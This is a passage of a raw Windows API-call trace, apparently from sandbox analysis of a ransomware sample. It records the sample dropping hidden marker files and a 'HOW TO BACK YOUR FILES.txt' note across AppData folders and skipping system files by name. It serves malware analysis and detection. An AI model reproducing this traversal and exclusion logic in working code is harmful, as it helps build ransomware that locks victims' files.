returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache" [0064.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0064.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0064.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache" [0064.696] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\" [0064.696] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0064.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.697] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.700] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.701] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.701] CloseHandle (hObject=0x2cc) returned 1 [0064.701] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache") returned 94 [0064.701] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.701] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0064.701] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.701] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.701] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.702] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.702] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.702] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.702] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.702] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.702] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.702] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe39df1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe39df1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.702] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.702] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.702] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe39df1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe39df1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.702] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0064.702] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.702] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.702] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.702] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.703] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.703] CloseHandle (hObject=0x2a0) returned 1 [0064.703] CloseHandle (hObject=0x2cc) returned 1 [0064.703] GetCurrentThreadId () returned 0xd98 [0064.703] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0064.703] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData" [0064.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123200 | out: hHeap=0xe0000) returned 1 [0064.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0064.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData" [0064.703] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\" [0064.703] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0064.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.704] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.707] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.708] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.708] CloseHandle (hObject=0x2cc) returned 1 [0064.708] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData") returned 91 [0064.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.709] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.709] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.709] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.709] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.709] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.709] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.709] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.709] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.709] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.709] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.709] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe39df1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe39df1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.709] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.709] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.709] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe39df1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe39df1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe39df1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.709] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.709] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.709] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.710] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.710] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.710] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.710] CloseHandle (hObject=0x2a0) returned 1 [0064.710] CloseHandle (hObject=0x2cc) returned 1 [0064.710] GetCurrentThreadId () returned 0xd98 [0064.710] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0064.710] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC" [0064.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123bd8 | out: hHeap=0xe0000) returned 1 [0064.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0064.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC" [0064.711] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\" [0064.711] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0064.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.713] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.716] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.717] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.717] CloseHandle (hObject=0x2cc) returned 1 [0064.718] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC") returned 86 [0064.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.718] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe5fce5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0064.718] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.718] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.718] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.718] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.718] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe5fce5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.718] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.718] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.718] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.718] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.718] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.718] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe5fce5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe5fce5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe5fce5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.718] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.718] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.718] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0064.718] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0064.719] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0064.719] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0064.719] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0064.719] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0064.719] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116040 [0064.719] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x11d008 [0064.719] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0064.720] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0064.720] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0064.720] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0064.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0064.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116110 [0064.720] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122308 [0064.720] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 